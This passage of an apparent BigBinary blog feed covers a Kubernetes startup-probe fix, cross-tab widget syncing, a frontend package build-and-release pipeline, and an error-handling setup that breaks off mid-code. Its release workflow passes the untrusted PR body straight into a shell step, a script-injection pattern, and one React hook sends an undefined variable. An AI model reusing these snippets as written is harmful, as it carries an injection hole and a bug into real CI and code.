      <updated>2024-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-fixed-app-down-time-in-neeto-deploy</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compellingalternative to Heroku. Stay updated by following NeetoDeploy on<a href="https://twitter.com/neetodeploy">Twitter</a> and reading our<a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><p>At <a href="https://www.neeto.com/">neeto</a> we are building 20+ applications, and most ofour applications are running in NeetoDeploy. Once we migrated from Heroku toNeetoDeploy, we started getting 520 response code for our applications. Thisissue was occurring randomly and rarely.</p><h3>What is 520 response code?</h3><p>A 520 response code happens when the connection is started on the origin webserver, but the request is not completed. This could be due to server crashes orthe inability to handle the incoming requests because of insufficient resources.</p><p>When we looked at our logs closely, we found that all the 520 response codesituations occurred when we restarted or deployed the app. From this, weconcluded that the new pods are failing to handle requests from the clientinitially and working fine after some time.</p><h3>What is wrong with new pods?</h3><p>Once our investigation narrowed down to the new pods, we quickly realized thatrequests are arriving at the server even when the server is not fully ready yetto take new requests.</p><p>When we create a new pod in Kubernetes, it is marked as &quot;Ready&quot;, and requestsare sent to it as soon as its containers start. However, the servers initiatedwithin these containers may require additional time to boot up and to becomeready to accept the requests fully.</p><h4>Let's try restarting the application</h4><pre><code class="language-bash">$ kubectl rollout restart deployment bling-staging-web</code></pre><p>As we can see, a new container is getting created for the new pod. The READYstatus for the new pod is 0. It means it's not yet READY.</p><pre><code class="language-bash">NAME                               READY  STATUS             RESTARTS  AGEbling-staging-web-656f74d9d-6kpzz  1/1    Running            0         2m8sbling-staging-web-79fc6f978-cdjf5  0/1    ContainerCreating  0         5s</code></pre><p>Now we can see that the new pod is marked as READY (1 out of 1), and the old oneis terminating.</p><pre><code class="language-bash">NAME                               READY  STATUS             RESTARTS  AGEbling-staging-web-656f74d9d-6kpzz  0/1    Terminating        0         2m9sbling-staging-web-79fc6f978-cdjf5  1/1    Running            0         6s</code></pre><p>The new pod is shown as <code>READY</code> as soon as the container was created. But onchecking the logs, we could see that the server was still starting up and notready yet.</p><pre><code>[1] Puma starting in cluster mode...[1] Installing dependencies...</code></pre><p>From the above observation, we understood that the pod is marked as &quot;READY&quot;right after the container is created. Consequently, requests are received evenbefore the server is fully prepared to serve them, and they get a 520 responsecode.</p><h2>Solution</h2><p>To fix this issue, we must ensure that pods are marked as &quot;Ready&quot; only after theserver is up and ready to accept the requests. We can do this by usingKubernetes<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/">health probes</a>.More than six years ago we wrote<a href="https://www.bigbinary.com/blog/deploying-rails-applications-using-kubernetes-with-zero-downtime">a blog</a>on how we can leverage the readiness and liveness probes of Kubernetes.</p><h3>Adding Startup probe</h3><p>Initially, we only added<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#define-startup-probes">Startup probe</a>since we had a problem with the boot-up phase. You can read more about theconfiguration settings<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#configure-probes">here</a>.</p><p>The following configuration will add the Startup probe for the deployments:</p><pre><code class="language-yaml">startupProbe:  failureThreshold: 10  httpGet:    path: /health_check    port: 3000    scheme: HTTP  periodSeconds: 5  successThreshold: 1  timeoutSeconds: 60  initialDelaySeconds: 10</code></pre><p><code>/health_check</code> is a route in the application that is expected to return a 200response code if all is going well. Now, let's restart the application againafter adding the Startup probe.</p><p>Container is created for the new pod, but the pod is still not &quot;Ready&quot;.</p><pre><code class="language-bash">NAME                               READY  STATUS            RESTARTS  AGEbling-staging-web-656f74d9d-6kpzz  1/1    Running           0         2m8sbling-staging-web-79fc6f978-cdjf5  0/1    Running           0         5s</code></pre><p>The new pod is marked as &quot;Ready&quot;, and the old one is &quot;Terminating&quot;.</p><pre><code class="language-bash">NAME                               READY  STATUS            RESTARTS  AGEbling-staging-web-656f74d9d-6kpzz  0/1    Terminating       0         2m38sbling-staging-web-79fc6f978-cdjf5  1/1    Running           0         35s</code></pre><p>If we check the logs, we can see the health check request:</p><pre><code>  [1] Puma starting in cluster mode...  [1] Installing dependencies...  [1] * Puma version: 6.3.1 (ruby 3.2.2-p53) (&quot;Mugi No Toki Itaru&quot;)  [1] *  Min threads: 5  [1] *  Max threads: 5  [1] *  Environment: heroku  [1] *   Master PID: 1  [1] *      Workers: 1  [1] *     Restarts: () hot () phased [1] * Listening on http://0.0.0.0:3000 [1] Use Ctrl-C to stop [2024-02-10T02:40:48.944785 #23]  INFO -- : [bb9e756a-51cc-4d6b-9a4a-96b0464f6740] Started GET &quot;/health_check&quot; for 192.168.120.195 at 2024-02-10 02:40:48 +0000 [2024-02-10T02:40:48.946148 #23]  INFO -- : [bb9e756a-51cc-4d6b-9a4a-96b0464f6740] Processing by HealthCheckController#healthy as */* [2024-02-10T02:40:48.949292 #23]  INFO -- : [bb9e756a-51cc-4d6b-9a4a-96b0464f6740] Completed 200 OK in 3ms (Allocations: 691)</code></pre><p>Now, the pod is marked as &quot;Ready&quot; only after the health check succeeds, in otherwords, only when the server is prepared to accept the requests.</p><h3>Fixing the Startup probe for production applications</h3><p>Once we released the health check for our deployments, we found that healthchecks were failing for all production applications but working for staging andreview applications.</p><p>We were getting the following error in our production applications.</p><pre><code class="language-bash">Startup probe failed: Get &quot;https://192.168.43.231:3000/health_check&quot;: http: server gave HTTP response to HTTPS client2024-02-12 06:40:04 +0000 HTTP parse error, malformed request: #&lt;Puma::HttpParserError: Invalid HTTP format, parsing fails. Are you trying to open an SSL connection to a non-SSL Puma?&gt;</code></pre><p>From the above logs, it was clear that the issue was related to SSLconfiguration. On comparing the production environment configuration with theothers, we figured out that we had enabled<a href="https://guides.rubyonrails.org/configuring.html#config-force-ssl">force_ssl</a>for production applications. The <code>force_ssl=true</code> setting ensures that allincoming requests are SSL encrypted and will automatically redirect to their SSLcounterparts.</p><p>The following diagram broadly shows the path of an incoming request.</p><p><img src="/blog_images/2024/how-we-fixed-app-down-time-in-neeto-deploy/image4.png" alt="HTTPS request path"></p><p>From the above diagram, we can infer the following things:</p><ul><li>SSL verification is happening in the ingress controller and not in the server.</li><li>Client requests are going through the ingress controller before reaching theserver.</li><li>Request from ingress controller to the pod is an HTTP request.</li><li>The HTTP health check requests are directly sent from Kubelet to the pod anddo not go through the ingress controller.</li></ul><p>Here is how our health check request works.</p><ol><li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/">Kubelet</a>sends an HTTP request to the server directly.</li><li>Since <code>force_ssl</code> is enabled,<a href="https://api.rubyonrails.org/v7.1.2/classes/ActionDispatch/SSL.html">ActionDispatch::SSL</a>middleware redirects the request to HTTPS.</li><li>When the HTTPS request reaches the server, <a href="https://puma.io/">Puma</a> throws<code>Are you trying to open an SSL connection to a non-SSL Puma?</code> error since noSSL certificates are configured with the server.</li></ol><p>The solution to our problem lies in understanding why only the health checkrequest is rejected, whereas the request from the ingress controller is not,even though both are HTTP requests. This is because ingress controller sets someheaders before forwarding to the pod, and the header we are concerned about is<a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-Proto">X-FORWARDED-PROTO</a>.The <code>X-Forwarded-Proto</code> header contains the HTTP/HTTPS scheme the client used toaccess the application. When a client makes an HTTPS request, the ingresscontroller terminates the SSL/TLS connection and forwards the request to thebackend service using plain HTTP after adding the<code>X-Forwarded-Proto</code> along withthe other headers.</p><p>Everything started working after adding the <code>X-Forwarded-Proto</code> header to ourstartup probe request.</p><pre><code class="language-yaml">startupProbe:  failureThreshold: 10  httpGet:    httpHeaders:      - name: X-FORWARDED-PROTO        value: https    path: &lt;%= health_check_url %&gt;    port: &lt;%= port %&gt;    scheme: HTTP  periodSeconds: 5  successThreshold: 1  timeoutSeconds: 60  initialDelaySeconds: 10</code></pre><p>We also added<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#define-readiness-probes">Readiness</a>and<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#define-a-liveness-http-request">Liveness</a>probes for our deployments.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email at<a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join ourSlack community to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Widget state synchronisation across tabs]]></title>
       <author><name>Labeeb Latheef</name></author>
      <link href="https://www.bigbinary.com/blog/widget-synchronisation"/>
      <updated>2024-07-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/widget-synchronisation</id>
      <content type="html"><![CDATA[<p>The NeetoChat widget is the end-user-facing companion widget of our<a href="https://www.neeto.com/neetochat">NeetoChat</a> application. By embedding theNeetoChat widget on their website, NeetoChat users can easily interact withtheir customers in real-time.</p><p><img src="/blog_images/2024/widget-synchronisation/neeto-chat.png" alt="NeetoChat chat screen"></p><p>The NeetoChat widget has a feature to synchronize its state across other widgetinstances you might have open in any other tab or window, in real-time. Thisability gives users the illusion of interacting with the same widget instanceacross tabs and provides a sense of continuity. For example, user interactionssuch as navigating to another page, and minimizing/maximizing the widgetperformed on a widget instance in one tab are reflected across widgets in everyother tab.</p><p>In fact, a widget or the underlying script cannot be shared between multiplebrowser contexts (tabs, windows, etc). All scripts in a context run in anisolated environment, strictly separate from other executing contexts. However,there are methods we can use to enable communication between two browsercontexts. Some of the popular choices are listed below. With a propercommunication channel set in place, two widget instances can notify each otherabout their user interactions and state updates in real time to be synchronized.</p><ol><li>Use <strong>BroadcastChannel</strong> API</li><li>Use <strong>localStorage</strong> change listener</li><li>Use <strong>window.postMessage()</strong> method</li><li>Use Service Worker Post Message</li></ol><p>With ease of implementation and compatibility across different browserenvironments in mind, we have chosen to implement this feature using thelocalStorage change listener. The details of the implementation can be splitinto two parts.</p><h5>1. Navigation Checkpoint:</h5><p>When opening a new widget instance in a new tab or window, the widget resumesfrom the last checkpoint, allowing the users to continue from where they leftoff. This implementation is pretty straightforward. Whenever the URL pathnamechanges, we keep a reference in the localStorage called &quot;checkpoint&quot;.</p><pre><code class="language-jsx">const Router = ({ children }) =&gt; {  const history = useHistory();  const pathname = history.location.pathname;  const addCheckPoints = pathname =&gt; {    // Check if the current pathname matches any allowed routes.    // Only navigations to main pages are allowed to be added as checkpoints.    const isAllowed = ALLOWED_CHECKPOINT_ROUTES.some(route =&gt;      matchPath(pathname, { path: route, exact: true, strict: true })    );    // Writes the pathname to localStorage with a unique identifier    if (isAllowed) localStorage.setItem(&quot;checkpoint&quot;, pathname);  };  // Run for every pathname changes  useEffect(() =&gt; {    addCheckPoints(pathname);  }, [pathname]);  return &lt;App /&gt;;};</code></pre><p>Now, upon initializing a new widget instance, we check localStorage for anyexisting checkpoint and set this as the initial route, presenting the user withthe same screen they visited last time.</p><pre><code class="language-jsx">const history = useHistory();// Run on initial mountuseEffect(() =&gt; {  const checkpoint = localStorage.getItem(&quot;checkpoint&quot;);  // Replace initial route with checkpoint from localStorage.  if (checkpoint) history.replace(checkpoint);}, []);</code></pre><h5>2. Real-time Synchronisation:</h5><p>The above implementation only allows a new widget instance to start in the lastcheckpoint. From this point onwards, each state updates (minimize, maximize),and user navigation in one widget has to be synchronized in real time withactive widget instances in other tabs to maintain the same appearance across thetabs. At the core, this communication is enabled by adding a custom React hookcalled <code>useWindowMessenger</code>. The <code>useWindowMessenger</code> hook relies onlocalStorage values and localStorage change listeners for sending messages orevents across different browser contexts.</p><pre><code class="language-javascript">const storageKey = `__some_unique_localStorage_key__`;const origin = window.location.origin;const windowId = uuid(); // Assigns unique id for each browser contexts.const createPayload = message =&gt; {  const payload = {};  payload.message = message;  payload.meta = {};  payload.meta.origin = origin;  payload.meta.window = windowId;  return JSON.stringify(payload);};const useWindowMessenger = messageHandler =&gt; {  const messageHandlerRef = useRef();  messageHandlerRef.current = messageHandler;  const sendMessage = useCallback(message =&gt; {    const payload = createPayload(message);    // A new item is updated in local storage and immediately removed,    // This is sufficient to get the 'storage' event to be fired.    localStorage.setItem(storageKey, payload);    localStorage.removeItem(storageKey);  }, []);  useEffect(() =&gt; {    if (typeof messageHandlerRef.current !== &quot;function&quot;) return;    const handleStorageChange = event =&gt; {      if (event.key !== storageKey) return;      if (!event.newValue) return;      const { message, meta } = JSON.parse(event.newValue);      // Every window has a unique `windowId` attached.      // If event originated from the same `window`, the event is ignored.      if (meta.window === windowId || meta.origin !== origin) return;      messageHandlerRef.current(message);    };    // `storage` event is fired whenever value updates are sent to localStorage    window.addEventListener(&quot;storage&quot;, handleStorageChange);    return () =&gt; {      window.removeEventListener(&quot;storage&quot;, handleStorageChange);    };  }, [messageHandlerRef]);  return sendMessage;};export default useWindowMessenger;</code></pre><p>In essence, the useWindowMessenger hook returns a <code>sendMessage</code> function thatcan be used to send a message to widget instances in other tabs. Also, itaccepts a <code>messageHandler</code> callback that can receive and handle the messagessent by other instances.</p><p>Now, when one widget instance emits state and navigation change events, otherwidget instances handle these events to make necessary updates to their internalstate to mirror the changes. Below is a simplified example of how this was donein the NeetoChat widget.</p><pre><code class="language-javascript">import { useCallback } from &quot;react&quot;;import { useHistory } from &quot;react-router-dom&quot;;// useLocalStorage is an in-house implementation that sync its state value into localStorage and restores the last value on next load.import useLocalStorage from &quot;@hooks/useLocalStorage&quot;;import useWindowMessenger from &quot;@hooks/useWindowMessenger&quot;;export const MESSAGE_TYPES = {  STATE_UPDATE: &quot;STATE_UPDATE&quot;,  PATH_UPDATE: &quot;PATH_UPDATE&quot;,};const useWidgetState = () =&gt; {  // This internal state controls widget visibility and other behaviours.  const [widgetState, setWidgetState] = useLocalStorage(    &quot;widgetState&quot;, // Unique localStorage key    { maximized: false }  );  const history = useHistory();  const pathname = history.location.pathname;  const sendMessage = useWindowMessenger(message =&gt;    handleMessageTypes(message.type, message.payload)  );  const handleMessageTypes = (type, payload) =&gt; {    switch (type) {      // Actions such as minimize, maximize are received as &quot;STATE_UPDATE&quot;      case MESSAGE_TYPES.STATE_UPDATE:        // Payload contains new state values        // Commit new value updates to the internal state that controls widget.        setWidgetState(prevState =&gt; ({ ...prevState, ...payload }));        break;      // User navigation actions are received as &quot;PATH_UPDATE&quot;      case MESSAGE_TYPES.PATH_UPDATE:        // Payload contains new pathname        // Navigate to page if not already in the same page.        if (history.location.pathname !== payload) history.push(payload);        break;      default:        console.warn(`Unhandled message type: ${type}`);    }  };  // This function extends `setWidgetState` function by adding the ability to emit `STATE_UPDATE` event for each state update call.  const updateWidgetState = useCallback(async update =&gt; {    let nextState;    await setWidgetState(prevState =&gt; {      nextState = { ...prevState, ...update };      return nextState;    });    sendMessage({ type: MESSAGE_TYPES.STATE_UPDATE, payload });  }, []);  // Send &quot;PATH_UPDATE&quot; event for every path changes in the active widget.  useEffect(() =&gt; {    sendMessage({      type: MESSAGE_TYPES.PATH_UPDATE,      payload: pathname,    });  }, [pathname]);  return [widgetState, updateWidgetState];};</code></pre><p>With the above setup, all the widget instances in different tabs act like asingle widget by mirroring the actions from the active instance.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we build, release and maintain frontend packages]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/build-release-frontend-packages"/>
      <updated>2024-06-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/build-release-frontend-packages</id>
      <content type="html"><![CDATA[<p>Here at <a href="https://www.neeto.com/">neeto</a>, we build and manage a<a href="https://blog.neeto.com/p/neeto-products-and-people">lot of products</a>. Eachproduct has its team. However, ensuring consistent design and functionalitiesacross these products poses a significant challenge. To aid our product teams infocusing on their core business logic, we've organized common functionalitiesinto separate packages.</p><p>In this blog, we'll look into how we build, release, and maintain these packagesto support our product development cycles. Let's take a look at some of thesekey packages.</p><h3>neeto-cist</h3><p><a href="https://github.com/bigbinary/neeto-cist">neeto-cist</a> contains essential pureutility functions and forms the backbone of our development framework.</p><h3>neeto-ui</h3><p><a href="https://github.com/bigbinary/neeto-ui">neeto-ui</a> is the foundational designstructure for our Neeto products. It contains basic-level components likeButtons, Input fields, etc.</p><h3>neeto-molecules</h3><p>Built on top of <code>neeto-ui</code>, the <code>neeto-molecules</code> package houses reusable UIelements like a login page, settings page, sidebars etc. It simplifies thecreation of consistent user experiences across Neeto products.</p><h3>neeto-commons</h3><p><code>neeto-commons</code> store crucial elements such as initializers, constants, hooksand configurations shared across our entire product range. We wrote in greatdetail about the<a href="https://www.bigbinary.com/blog/neeto-commons-frontend">challenges we faced while building neeto-commons</a>.</p><p>Let's look at how we build, release, and maintain these packages.</p><h2>Build</h2><p>In general we use <a href="https://babeljs.io/">Babel</a> to transpile and<a href="https://rollupjs.org">Rollup</a> to bundle with some exceptions.</p><p>Let's look at our standard build configuration.</p><pre><code class="language-js">import peerDepsExternal from &quot;rollup-plugin-peer-deps-external&quot;;import svgr from &quot;@svgr/rollup&quot;;import babel from &quot;@rollup/plugin-babel&quot;;import resolve from &quot;@rollup/plugin-node-resolve&quot;;import alias from &quot;@rollup/plugin-alias&quot;;import json from &quot;@rollup/plugin-json&quot;;import commonjs from &quot;@rollup/plugin-commonjs&quot;;import styles from &quot;rollup-plugin-styles&quot;;import aliases from &quot;./aliases&quot;;export default {  input: {    Component1: &quot;src/components/Component1&quot;,    Component2: &quot;src/components/Component2&quot;,    //... rest of the entry points  },  output: [&quot;esm&quot;, &quot;cjs&quot;].map(format =&gt; ({    format,    sourcemap: true,    //... other options  })),  plugins: [    // To automatically externalize peerDependencies in a Rollup bundle.    peerDepsExternal(),    // Inline any svg files    svgr(),    // To integrate Rollup and Babel.    babel({      exclude: &quot;node_modules/**&quot;,      babelHelpers: &quot;runtime&quot;,    }),    // To use third party modules from node_modules    resolve({ extensions: [&quot;.js&quot;, &quot;.jsx&quot;, &quot;.svg&quot;] }),    // To define aliases while bundling package.    alias({ entries: aliases }),    // To convert .json files to ES6 modules.    json(),    // To convert CommonJS modules to ES6.    commonjs(),    // Handle styles    styles({      minimize: true,      extensions: [&quot;.css&quot;, &quot;.scss&quot;, &quot;.min.css&quot;],    }),  ],};</code></pre><p>When dealing with multiple entry points, passing an array of <code>input</code> is a commonmistake people make. The problem with an <code>input</code> array is that it will beduplicated if there is shared code. So, the best approach here is to pass akey-value object. This way, Rollup will create separate files for shared codeand reuse them everywhere.</p><p>Looking at the <code>output</code>, notice that we built it for CommonJS and ECMAScript.Even though we don't have any Node.js projects (we are mainly a Rails company),we still need the CommonJS format to run Jest tests and some scripts for buildand automation purposes.</p><p>When using Babel to transpile and Rollup to bundle, we ran into someconfiguration pain points.<a href="https://www.npmjs.com/package/@rollup/plugin-babel"><code>@rollup/plugin-babel</code></a>plugin made the configuration far easier.<a href="https://www.npmjs.com/package/@svgr/rollup"><code>@svgr/rollup</code></a> converts normal svgfiles to react components.<a href="https://www.npmjs.com/package/rollup-plugin-peer-deps-external"><code>rollup-plugin-peer-deps-external</code></a>automatically externalizes peer dependencies, keeping the bundle lean. Eventhough we don't have any CommonJS modules, it's better to add<a href="https://www.npmjs.com/package/@rollup/plugin-commonjs"><code>@rollup/plugin-commonjs</code></a>so that if there is any deep in dependency rabbit hole.</p><p>Above is a simplified version of the Rollup configuration we use on<code>neeto-cist</code>, <code>neeto-ui</code> and <code>neeto-molecules</code>. We took a much simpler approachwhen building <code>neeto-commons</code>. The reason for abandoning bundling for<code>neeto-commons</code> is that within this package, we have a variety of commonly usedelements, such as components, hooks, initializers, constants, utils, etc., eachwith varying sizes and dependency requirements. If the host project only wantsto use a few simple util functions, we don't want them to be served with theentire bundle and need to install lots of dependencies.</p><p>Instead of serving everything from the root <code>index.js</code>, we use<a href="https://webpack.js.org/guides/package-exports/"><code>exports</code></a> field in the<code>package.json</code> to specify which files can be imported by the host project. Belowis a sample of our exports.</p><pre><code class="language-json">&quot;exports&quot;: {  &quot;./react-utils&quot;: {    &quot;import&quot;: &quot;./react-utils/index.js&quot;,    &quot;require&quot;: &quot;./cjs/react-utils/index.js&quot;,    &quot;types&quot;: &quot;./react-utils.d.ts&quot;  },  &quot;./react-utils/*&quot;: {    &quot;import&quot;: &quot;./react-utils/*&quot;,    &quot;require&quot;: &quot;./cjs/react-utils/*&quot;,    &quot;types&quot;: &quot;./react-utils.d.ts&quot;  },  &quot;./utils&quot;: {    &quot;import&quot;: &quot;./utils/index.js&quot;,    &quot;require&quot;: &quot;./cjs/utils/index.js&quot;,    &quot;types&quot;: &quot;./utils.d.ts&quot;  },  &quot;./utils/*&quot;: {    &quot;import&quot;: &quot;./utils/*&quot;,    &quot;require&quot;: &quot;./cjs/utils/*&quot;,    &quot;types&quot;: &quot;./utils.d.ts&quot;  },  &quot;./initializers&quot;: {    &quot;import&quot;: &quot;./initializers/index.js&quot;,    &quot;require&quot;: &quot;./cjs/initializers/index.js&quot;,    &quot;types&quot;: &quot;./initializers.d.ts&quot;  },  &quot;./constants&quot;: {    &quot;import&quot;: &quot;./constants/index.js&quot;,    &quot;require&quot;: &quot;./cjs/constants/index.js&quot;,    &quot;types&quot;: &quot;./constants.d.ts&quot;  }}</code></pre><p>We export, for example, <code>./react-utils</code> and <code>./react-utils/*</code> because we want tosupport both import styles below.</p><pre><code class="language-js">import { useLocalStorage } from &quot;neetocommons/react-utils&quot;;</code></pre><pre><code class="language-js">import useLocalStorage from &quot;neetocommons/react-utils/useLocalStorage&quot;;</code></pre><p>We initially employed the first import style, but as we expanded, we recognizedthe necessity of supporting a more concise approach in smaller projects. Thissecond method involves importing solely the target file without additionaldependencies, significantly improving tree-shaking capabilities.</p><p>We also ensure we build for <code>esm</code> and <code>cjs</code>. Below is our simplified Babelconfig.</p><pre><code class="language-js">const defaultConfigurations = require(&quot;./defaultConfigurations&quot;);const alias = {  assets: &quot;./src/assets&quot;,  neetocist: &quot;@bigbinary/neeto-cist&quot;,  // others};module.exports = function (api) {  const config = defaultConfigurations(api);  config.sourceMaps = true;  config.plugins.push(    [&quot;module-resolver&quot;, { root: [&quot;./src&quot;], alias }],    &quot;inline-react-svg&quot;  );  if (process.env.BABEL_MODE === &quot;commonjs&quot;) {    config.overrides = [      {        presets: [[&quot;@babel/preset-env&quot;, { modules: &quot;commonjs&quot; }]],      },    ];  }  return config;};</code></pre><p>When transpiling, we ensure aliases are correctly resolved, and if there are anySVG files, we inline them using the<a href="https://www.npmjs.com/package/babel-plugin-inline-react-svg"><code>inline-react-svg</code></a>plugin to make life easy for the host application. Below is our build script.</p><pre><code class="language-json">&quot;scripts&quot;: {  &quot;build:pre&quot;: &quot;del-cli dist&quot;,  &quot;build:es&quot;: &quot;babel  --extensions \&quot;.js,.jsx\&quot; src --out-dir=dist&quot;,  &quot;build:cjs&quot;: &quot;BABEL_MODE=commonjs babel  --extensions \&quot;.js,.jsx\&quot; src --out-dir=dist/cjs&quot;,  &quot;build:post&quot;: &quot;node ./.scripts/post-build.mjs&quot;,  &quot;build&quot;: &quot;yarn build:pre &amp;&amp; yarn build:es &amp;&amp; yarn build:cjs &amp;&amp; yarn build:post&quot;,}</code></pre><h2>Release</h2><p>We did not want to create a release every time we merged a PR, and we alsodidn't want to manually release packages every time. Instead, we rely on GitHubLabels while running Github Actions to do the release.</p><p>We created three labels specifically for this purpose: <code>patch</code>, <code>minor</code> and<code>major</code>. As the names suggest, these labels help us create <code>patch</code>, <code>minor</code> and<code>major</code> versions. When we create a PR and want to do a release when merging,attach any of these labels, and GitHub Action will create releases accordingly.</p><pre><code class="language-yaml">name: &quot;Create and publish releases&quot;on:  pull_request:    branches:      - main    types: [closed]jobs:  release:    name: &quot;Create Release&quot;    runs-on: ubuntu-latest    if: &gt;-      ${{ github.event.pull_request.merged == true &amp;&amp; (      contains(github.event.pull_request.labels.*.name, 'patch') ||      contains(github.event.pull_request.labels.*.name, 'minor') ||      contains(github.event.pull_request.labels.*.name, 'major') ) }}</code></pre><p>As evident from the code above, we trigger the <code>Create and publish releases</code>GitHub Action only if any of the three aforementioned labels are present. Oncethat condition is met, we proceed to use<a href="https://classic.yarnpkg.com/lang/en/docs/cli/version/"><code>yarn version</code></a> toupdate the version.</p><pre><code class="language-yaml">- name: Bump the patch version and create a git tag on release  if: ${{ contains(github.event.pull_request.labels.*.name, 'patch') }}  run: yarn version --patch --no-git-tag-version- name: Bump the minor version and create a git tag on release  if: ${{ contains(github.event.pull_request.labels.*.name, 'minor') }}  run: yarn version --minor --no-git-tag-version- name: Bump the major version and create a git tag on release  if: ${{ contains(github.event.pull_request.labels.*.name, 'major') }}  run: yarn version --major --no-git-tag-version</code></pre><p>Then, we extract changelogs from PR's title and description.</p><pre><code class="language-yaml">- name: Extract changelog  id: CHANGELOG  run: |    content=$(echo '${{ steps.PR.outputs.pr_body }}' | python3 -c 'import json; import sys; print(json.dumps(sys.stdin.read().partition(&quot;**Description**&quot;)[2].partition(&quot;**Checklist**&quot;)[0].strip()))')    echo &quot;CHANGELOG=${content}&quot; &gt;&gt; $GITHUB_ENV  shell: bash- name: Update Changelog  continue-on-error: true  uses: stefanzweifel/changelog-updater-action@v1  with:    latest-version: ${{ steps.package-version.outputs.version }}    release-notes: ${{ fromJson(env.CHANGELOG) }}</code></pre><p>Finally, we publish the package to NPM.</p><pre><code class="language-yaml">- name: Publish the package on NPM  uses: JS-DevTools/npm-publish  with:    access: &quot;public&quot;    token: ${{ secrets.NPM_TOKEN }}</code></pre><h2>Maintenance</h2><p>Now that the release is done, we need to propagate changes to our products. Forexample, we may have extracted an existing functionality from one of thepackages. Here is an example of<a href="https://www.bigbinary.com/blog/how-we-standardized-keyboard-shortcuts">how we standardized keyboard shortcuts in neeto</a>and extracted out into a package. Now, the product team needs to remove thatfunctionality and use it from the package. Reaching out to each team and askingthem to replace it can be tedious, especially considering their priorities. Sowe came up with a plan to use custom<a href="https://eslint.org/docs/latest/extend/custom-rules">ESLint rules</a> to enforcethem, and we built <code>eslint-plugin-neeto</code>.</p><p>Let's look at a few examples of how we use <code>eslint-plugin-neeto</code> to enforcechanges on the product team.</p><p>There are some third-party packages we decided not to use when we found betteralternatives, and they even included our own. For example, <code>bootstrap</code>,<code>moment.js</code>, <code>@bigbinary/neeto-utils</code>, etc. To enforce this, we create ESLintrules called <code>no-blacklisted-imports</code>. This rule throws a lint error ifdevelopers attempt to commit changes that include these blacklisted imports.</p><p>Another example is that we moved higher-level constants, commonly utilizedacross various products, to <code>neeto-commons</code>. To enforce this, we created anESLint rule called <code>use-common-constants</code>. This rule detects any local importsand recommends importing from <code>neeto-commons</code> instead.</p><p>Here is another great blog post in which we explained the challenges we facedwhile<a href="https://www.bigbinary.com/blog/react-localization">adding translations and enforcing them using ESLint and Babel plugins</a>.</p><p>These are just a few of the many ESLint and Babel plugins we created.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we automated displaying error pages based on API responses]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/automatically-displaying-errors"/>
      <updated>2024-05-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/automatically-displaying-errors</id>
      <content type="html"><![CDATA[<p>Error handling is an important aspect of building software. We've automatederror handling wherever possible so that we can deal with it in a consistentmanner. By automating this process, we've allowed our product engineers to focuson shipping quality software.</p><p>This blog is about how we automated handling and displaying error pages in<a href="https://www.neeto.com/">neeto</a> applications.</p><p>Before we jump in, let's look at <a href="https://axios-http.com/">Axios</a> and<a href="https://github.com/pmndrs/zustand">Zustand</a>, two npm packages we heavily relyon.</p><h4>Axios</h4><p>We use <a href="https://axios-http.com/">Axios</a> to make API calls. Axios allows us tointercept API calls and modify them if necessary.</p><pre><code class="language-js">axios.interceptors.request.use(request =&gt; {  // intercept requests});axios.interceptors.response.use(request =&gt; {  // intercept responses});</code></pre><p>This feature is useful for tasks such as setting authentication tokens, handlingcase conversion for requests and responses, cleaning up sensitive headers whensending requests to third-party domains, etc. This is also a good place touniversally handle any errors on API calls.</p><h4>Zustand</h4><p><a href="https://github.com/pmndrs/zustand">Zustand</a> is a small, fast, scalable,barebones state management solution using simplified flux principles. We useZustand for state management instead of Redux/React context. Here is a simpleexample of how to create a store using Zustand.</p><pre><code class="language-js">import { create } from &quot;zustand&quot;;const useBearStore = create(set =&gt; ({  bears: 0,  increasePopulation: () =&gt; set(state =&gt; ({ bears: state.bears + 1 })),  removeAllBears: () =&gt; set({ bears: 0 }),}));</code></pre><p>To learn more about Zustand, check out there<a href="https://zustand-demo.pmnd.rs/">documentation</a>.</p><h3>Detecting errors</h3><p>Let's look into how we handle errors in our applications. As a first step, let'sexamine the universal Axios response interceptor we wrote to detect any error.</p><pre><code class="language-js">import axios from &quot;axios&quot;;axios.interceptors.response.use(null, error =&gt; {  if (error.response?.status === 401) {    resetAuthTokens();    window.location.href = `/login?redirect_uri=${encodeURIComponent(      window.location.href    )}`;  } else {    const fullUrl = error.request?.responseURL || error.config.url;    const status = error.response?.status;    //TODO: Notify the user that an error is occurred.  }  return Promise.reject(error);});</code></pre><p>For each response, if it detects a 401 HTTP error, the code resets theauthentication tokens and redirects the user to the login page. For any othererror, we need to notify the user with an appropriate message.</p><h3>Storing errors</h3><p>When an error happens, the user could be on any page, so we should be able todisplay an error message no matter which page the user is on. For that, we needto store the error in a way that it can be retrieved from anywhere. This iswhere Zustand comes into play. It is very easy to create a store in Zustand andcan be used as a hook in React applications.</p><pre><code class="language-js">import { prop } from &quot;ramda&quot;;import { create } from &quot;zustand&quot;;const useDisplayErrorPage = () =&gt; useErrorDisplayStore(prop(&quot;showErrorPage&quot;));export const useErrorDisplayStore = create(() 